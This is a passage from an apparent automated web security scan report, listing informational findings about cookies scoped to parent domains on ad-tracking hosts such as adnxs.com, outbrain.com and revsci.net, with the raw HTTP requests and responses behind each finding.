TFF=eJydkz1uwzAMhe%252BSE5BPshgpS46R1YOHAt2aLcjdQ7uNauunpT0IFIz3UXwP9JgQ0%252BMrMdKJRa5EfI0x4nQZE9LjI%252FFFzzA4LfS%252BPlXvV3oIQDPhCgJ6zv%252BRfITkGJ3gCOmVJPub21yGg1ywcpIxG6FVxN57uk2f430qegf8EOwbNkDevhZbfTcu%252FpvrxlVykjEbod%252FId5TozcQ7vfM%252B75KxPWmxOLWN5mTyqw8NffWO1AmEvIwLZiPmZXTG3stMs%252B0ztTwEynq91vrSw6LfZvXNScZshNZyQ%252FLvgc5M4LaHlR4NfeUB9URYeVDMRjxfEXx3iQ%253D%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxljsEKwjAQBf8l90KySXaT9SRt1SqWahF7k7SpINKL4kn8d9se9fYYZuAFNvx%252BsmZxKjKxGBewwO5KEcFHTV71PZrQtUAqyrZVELWaPKVYvG7xUoM0y6yZEBCLdJnX%252BWpdHd0g79vNEMtHv88Ou3Pj%252FqqqnJFn4RC18UgI4I3WBGh%252F7aJM53vIIljtyLY2CY4oMUHqJEQVkh5cRxK8NzTmny8%252Ftjl1; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJy9VMtOwzAQ%252FJd8gR9xLDuXlnAgEjURtSo4oR45c4T%252BO04cnI27m4iAep3Zmd11NnO2UtvPD8uZLfZ3fmeEFoIV9bvlSsk6ENIWhyfnHx5f307tsfVFfbZKLWrkgEMTWMkz4vnwgloEnKrELLgxUguEKAPBcsW%252Bc%252FjcnaMqryzu8bkDDiuVLY6ClQH9YnxnjKkyn4mFhEhErtGJodqIXqKoNoJuk2vSihxr1bmljQYWa9W%252FJ77R%252FO3HNq07jW2wjSKLtAlErtGJgfUaGAnk%252FmGj2dOVoNGVCnHlS2LygelvObD0AytknEEj6SUjj8yJ%252Fi6YK7Yk%252BgcZW3iuZT%252FpzxJVgMsIAwQUQrgf2XNWeuBQsUCoEQdQ%252FzJjLRgjUqONgzZisnEAmtVKSKRTbeanmmQTC4l0qk2uSefTJPCyJUZvkZq%252FD8mVTKSjbyXl%252Fj%252FM6MxaiSc6hRYCJ14FkSuRpHMFF3PkTIlc%252BUN83DIlNJ4JeikTtgTA1r%252Bd%252Bqkv3wcsPF0%253D; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkjEOwjAMRe%252FCCeyfpiZh4RisHTogscGGuDsulNCmCbgdokTtf7a%252F9bvoEO%252FXyIg7FjkS8TGEgN2hi%252FrjHPmgx3unF32eD9U3Ez0EoIFwGQE9%252B38kbyE5BCfYQjZKkr3nfC9%252BI9daOUmYjdBbxF67P%252FWX7tZntVuMBPuCDVBjj8VcX10X%252F%252Baq68o5SZiN0G%252FUVMxXvfBK77zOuyRszbZYnNpGcTL56tuCftFHxj7IOEmYjRjC6Iy1XzMNtvdU8tBS0utzqc89vPTzXb05SZiN0LuaEFRmApc9TPQo6BcesJwIEw%252BKWYmURV%252FMbnGyiT7P7q%252FJRsxGPJ4iJp3R; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 11-Apr-2010 17:31:22 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 11-Apr-2010 17:31:22 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJylzksKgDAMhOG7eIJM2rQmPUxw2bVL6d21%252BABBUHA5fP9iJhNbqilnZiqToS8qs2G0ASLBsyNnJ4InH4fSjhgf46ga6GusqrKl8S2thrsyxUPRlR8Ul4ZLE58qcHTdT6TtBP870doK4EBXtg%253D%253D; expires=Tue, 09-Aug-2011 17:31:23 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 11 Apr 2011 17:31:24 GMT
Server: HTTP server

5.86. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d40216F8D69CC4BA2B6BB97A8F588BDDF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=8663496762294337265; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+J%%LNO`q1dAwm#D.b$Vh%:BL/)KoJY7-0rw(eDJ*n7i%aT[>CE$WT)bC:u1N35Z>tomY?5J0hBLq-eI#9K$VvH+_$Es).Zo2bVEY9yagWMy7`.O3ciK/#S1wy`=>

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 00:18:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 00:18:14 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:18:14 GMT

GIF89a.............!.......,........@..L..;
5.87. http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.foxnews.com
Path:   /b/ss/foxnews/1/H.20.3/s57025025668554

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/foxnews/1/H.20.3/s57025025668554?AQB=1&ndh=1&t=11/3/2011%2011%3A21%3A5%201%20300&ce=utf-8&ns=foxnews&pageName=fnc%3Aroot%3Aroot%3Achannel&g=http%3A//www.foxnews.com/&cc=USD&ch=root&events=event1&c1=root&v1=D%3Dc1&h1=fnc%2Croot&c2=root&v2=D%3Dc2&c3=root&v3=D%3Dc3&c4=root&v4=D%3Dc4&v10=D%3DpageName&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=root%3AFoxNews.com%20-%20Breaking%20News%20%7C%20Latest%20News%20%7C%20Current%20News&c41=12%3A00PM&v41=12%3A00PM&c42=Monday&v42=Monday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1079&bh=1038&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B

Response

HTTP/1.1 302 Found
Date: Mon, 11 Apr 2011 16:21:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26D1953A850108DA-400001046000A375[CE]; Expires=Sat, 9 Apr 2016 16:21:09 GMT; Domain=.foxnews.com; Path=/
Location: http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554?AQB=1&pccr=true&vidn=26D1953A850108DA-400001046000A375&&ndh=1&t=11/3/2011%2011%3A21%3A5%201%20300&ce=utf-8&ns=foxnews&pageName=fnc%3Aroot%3Aroot%3Achannel&g=http%3A//www.foxnews.com/&cc=USD&ch=root&events=event1&c1=root&v1=D%3Dc1&h1=fnc%2Croot&c2=root&v2=D%3Dc2&c3=root&v3=D%3Dc3&c4=root&v4=D%3Dc4&v10=D%3DpageName&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=root%3AFoxNews.com%20-%20Breaking%20News%20%7C%20Latest%20News%20%7C%20Current%20News&c41=12%3A00PM&v41=12%3A00PM&c42=Monday&v42=Monday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1079&bh=1038&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 10 Apr 2011 16:21:09 GMT
Last-Modified: Tue, 12 Apr 2011 16:21:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www35
Content-Length: 0
Content-Type: text/plain

5.88. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html&settings=true&recs=true&widgetJSId=SB_2&key=AYQHSUWJ8576&idx=0&version=36720&ref=http%3A%2F%2Fwww.wptz.com%2Fnews%2Findex.html&apv=false&rand=0.9197700712829828&sig=il HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=251d3be2-4514-4ca7-9d4f-e0873871b5bc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=251d3be2-4514-4ca7-9d4f-e0873871b5bc; Domain=.outbrain.com; Expires=Tue, 03-Apr-2012 12:30:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1302352248759; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="3kfMmu42uMQ="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 05-May-2012 12:30:48 GMT; Path=/
Set-Cookie: _lvd2="eG6mUIYxlPl5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 16-Apr-2011 01:18:48 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 05-May-2012 12:30:48 GMT; Path=/
Set-Cookie: recs-4605f628f91de21e4b5f9433f46e29eb="TzfEOIRkmbMHOLUEevQ6iACEaThf5EywnAOvJKUY95/n+ZcMKGx626RG93OMfYuvVETVSTcWr24ZLLSqhAR7AnlY5dw71Rxl"; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 09-Apr-2011 12:35:48 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:30:48 GMT
Content-Length: 6191

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'198886491','req_id':'2d6842eb89c7ef422fcc212014a03c6d'},'score':{'preferred
...[SNIP]...
5.89. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.7953731208108366 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=dd7423b0-80a9-45ce-83f1-e3452ea306b5; Domain=.outbrain.com; Expires=Tue, 03-Apr-2012 12:30:48 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1301899424000"
Last-Modified: Mon, 04 Apr 2011 06:43:44 GMT
Content-Type: text/html
Content-Length: 158
Date: Sat, 09 Apr 2011 12:30:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>
5.90. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEHY1ZuArE-t4uQIwODrZlUM&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF50OBL3IQT5v7foPYsPevS4OR0KNpBWaN1JDo1zU0ubO+9OLE5ntq0/AjloMpK22+U98p6XRuQkV6vbR8HQhJyal/eeQNvllZtPuZet2ARw7v6ZzuM6E0aUO83uYeBaSgzoIOkJtKzgPSBYCT8mIKXc9qOf0xNF3EQH79I2WYh5GTmoLoX+0crhe7eBwnVRDBVg0GcVoinrWEhPqFGfARbf3+k3i5NsM/ENgHEgGnkWEROLIVxV1KDQHR8lDHrTVSLs+6Onq/hm2XeMZNJuhFuRz6DLOOEG18FVYPoTtRdrWDxpyJLESSzGkSiHrpaEI=; rtc_nJDN=MLsv8SMucB5j5hAH0vmC/252VHiLIgT9sbGvQkQvgrafLIBiBEREiMw9JMHYtmWAML6kTuNHWEhy9hojbdls+dquwaa5GuMToA3eQeIOKZU4EPLYIyw/1PF5b3337mlJR4MFicB6+ZhO4eo2hIosgeRPF1VsnEwSW73nLGe8/i9Fx925s2s5IqolwaPstmdeLowJqlIYdQ2l5XhdhHdkaxQvMw0eLcHsQ1mVT8azUmBbvyo/Cw6yNsQc4SsNfFGkesd1eUewEe1KFcSACCYGCX7PqHiCqh6JpcY3Xecg42q2j0Nb3H+oR/930ZfKST54xVszS/4aMJzKqAH0raB0p9t9kyBANRK56/5sDFV5v3gPUuIQrv12o3AZh2JKsvhbcS8oB8bsiS3iFlBeBhFQMXVeMoS1C1NjSBDpUHXi0ILIPeIjTtrWUgq4W2ZgGPlrvKgYwRx04vWr7RqamvgBSsOZkiq3KItyJkA6gszT33rHfwJ1wsam6ahy12FPJRWnA15T5vdg4Z+riVZhzvuy; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6pbNmEREzM5uAkEsBEzbqEBjKmOxigTwd3Jm/a81YhltY+GVTu54epWIHf3oi1YHPA5mRwJx+S5OA5wH52YG00IY1gV2MfhXAnM8HrWnIYxgAti1CcJVLGWcatFKzsmuyD2sgaUns7MtMICDCCUI21K9mC3TU2Yj/q7kFyEiC9qd6iQZWUAOqbl4SiLlDZEbKHOPxQcwD2OO8AA22wiW8ixPSzGRb4p7YFvfyBk64IHbuLC6WKdvP9jXxKgAf4NTe3tjcO++99eJjQFJ9rb7OBau9lrmeaQxVwIj8pBOIjk9At1gWBBaniY6oEmHPso/5dLFYI41YY3i9qHRnWpzXTOgVAj42EJDEGS6vctRKcNFAiCEMZjBcZHVvt2laXJQlK59Srh7s7SBL4dLkSAcPQ3Rt6OTpHPLJptvHwTthDTg5+J9WOk59LQz9b66o/rLUTQUmwl4Ic0uouuQhfmSI/a8X29UwYo8sbIG3ONlKgg/Kqmo3cLl9i+tGjb6XydXH6f3ucPvEQYtt2BNVV0EfWqruc+eQLmitkxseBiCsvQS2hUBGND7uZdFI0owNCOUwWdC97/953WhT3REpDfgVvh+jIs45SZQnFlgPiMyfOlHlQ7WNHSe1+QBVVgnWw182djaAuxROHS8I3BCrEZi4d/BfU2FS/KyPooQ0EAv4Yy72wdytELJmcob/G1DPx2+NrESVh9tsdFVNWFSqx7ZofP8aj3L3KrXj8iD/8cfSWrT68uNSXimA6BAeiO0cGtgbsV/Ox0TAb4JnY3Z+WGp/9eF2KiVH6pi2c3yya9KESMyStLPL3cidKvwb7CwQDzdaB/TwhJiNXR1HxDiinMeVvomx0vjdN7XTrT1+O4Lv9WAGOONzEG9xBCxrFPy8W6v6I5SB6SbecDqFNAMrbuC9DwMA2GpdEbq22RostjaDN6Qa/OK+oqwE0FVdHyjLRr7yw0NTDvDqGk8Snhn/WEqtEBsE1oZ5SI1gDENnVJNIfU9Zy6Jk99abCAYArFBWQEww297LSqd5an4S7J7IbYtJWaxomJU0oClIC/eF/zYu92VmdtrtfCDHjEg21Ul296Sv7oZrz0kQnPr+2nsGnk6pCC9FC9HeUKrA1ih2Eqf759ij2OvucLz1/aCxnOnWbLgYi6ThGi4L8hUgAimXe4s1XmozecrKjkUfyK2/fbJKEyrk=; rsi_us_1000000=pUP1Jk+j/wMU1E0vRTPS2JnZ0DSpp5aLVLEjTHoN5P2iM4eIkHSp85fD17iCQMAW1btYONwq0oTM3buXl/GErwwKoFpABzfHx6S9fEmVBvyz2BYdN52BKcikFxV38nYDN+vL1IYi1vyqEUbmTzcPx7jpc1xf9G0l2Z3cPBmFr55URPk/m9Tts3Ft+ajEUO9cv4wZCYmGMcisG36qD0yP0mfNm2lFnH7hux+IEGEjDH85Poa6RomyoZSI2BXdtdCxNisAaWHg2NTiZf6fRWQePNmsr8mVjmlxeNTHQ1m/lRHtinEi/hKJH3dGS+dC1Vd/E/J7PipH7IKj8sIztBSvtaAHkEtmsMd4dv2n1NkvPNisyym1NjnZu/lSltMeKgJaDASJdC0+FLVr1pK860/L+qinU6RUMeqJGvmGz3L1lHOf4EfPvqsGAn1RX9a4vVMyIHW7y/h4BrAOhT3rBgSFfNQGoneHu0w3WF4/JwQusiX2r3AU0i5d5Ek5oqm+nJbLxjPZ5MQmFun3UHukSC0L4WWRmmymdL4WAtYiFH/s8a0rm2Nme5x3AM2fhJjN1x/Co1/yi+/MtQzq+ReoVAAslQWgb0te4bpDNgZdZmd42itbg91lDxFVWuoVAY7c2RS/5Jgk/Yd261+Ua5QTQ65heg/m2xlM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OFaAIQV6mdYdLAussMD58CRF/K+OevJwd2pKPAsA2HOgBSPAgQrsibp15FkKSjqac2eH0lgGWx+zWRJ7JnHzOpvwOvxoXANvMondmdJTD7RS3gzwstR0oiH3p3Bbz16WYpbU0sXP+0XdEHzuNer6cSTTDsisw5SEmWL73VP9NXv47fO00JfDMOicOHNE2xERNWQ/ByBAj59yEeTj8aCMuBtWnyPBvPBRX1OZ4DdiRRH4iWAamtE8NJipqMevjhWe72UpKTPm+AiLw/ocxqQn3007tmktw8qmiWwrbC9NqaxAsPvZmrEaYJgY6L; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39SUJaSpr557EdtIXqfE3HZxD2jF7YYAV7uTQoXkALe+h8Dca82Rp4QDOVAIGzRVDE7jI/n/4akBaNcbN8GRUBNkmj5UlcEQ1VUbpaqXvbt87W3xwl2cHM3wsktRu41scXZ8P4K7/CdybqhEZldnbou+DbEBGHBKyha7v7WSPvn5H2ajzRPgz+xQVkIUirLn7eE3zJdbKV82vWoQaCvYVOURHMQHF1fAsE+JlNjbmH7mqGg6dncGdZaI/iWbkhlnUJrftAsbyQABUtsCEFy3NIM7+FH9yH5NcRvKmIN17eCO7UsTPVEaZpQ48Tn5e1RCFy+kaz5GeEUfngWa9ba8UO05fHqgzsZJ9OSpZ3JxXTuCVjT4QpZxGdwpU2dyQfQA/8UiMjdKivwgK75eN2Bm7/ACqF+0TjejWTUjuQuNLgvSvyirzN34hblyDsnk93EvhyvSlrUyHPBleVKREww/dq+nPP1uMbRZyKO/H5SW/kNkrOIuzNwAbLIf1Eq3wf9dEPTKndtpfMxVnKBUj2JPmv2ReT0SPEXSCiN1i09KWxU4z8RYZSFL2dcBxyM9m1tKvBTRwCbdz6wn/dLR3FDAqjleSgedz1J++wb1aSs96zQ8MzfAomvRdUq7yMrNnfUPU+QZ/cnfOMO34O/tEL905B5QZNmcoTw8LGVSM14JH4cWSOEZLAozvvToSBOQgDBqEicHstsbBQvM3cCDABTKb9ytfxncOHQ0yBRUa6ka4ckA8U004sydatpOsp8siHUriuCMJ5qV2/WhvmwiuJpREUh0xDs+Aht4fOa6P9rxWXpemVMQFrdtoWlPWdPEMfWRI0AcY2gmTiSREzrknUSHc+EMzg5WQdsDBgZScSvdoatSsUdhEYxqkCNUk+wYyTShamJlepNn4Xj24X5er29wVxdbgVZ2WCm0lrfFa4GeFlajUW46Klr3NLqKVrENE3GDBQSG39/3ag9OXDww9/Vqk6EvVO0hwoJN9k87C8bMuDNLirgdVHgJ4eO2g872g7xHqk9xJpdM4j1ZZjfcnrjsw2FeuD8iVAwTKwXiHdyzWcBQ+6Jc0rRp9OegDv0wqln0P7L2QhdFQpP9LVPQIuMkhyhzqbiLjvr6gOnhzpF8b/EpkY5aV155J0ukKG9r280PyIWxfmk7cQuf9s/01eWi3coe/CofkCdG6/fy3Z2MRg9g=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:09 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 11 Apr 2011 16:21:08 GMT

GIF89a.............!.......,...........D..;
5.91. http://pix04.revsci.net/E05510/b3/0/3/1003161/184358339.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/184358339.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/184358339.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; 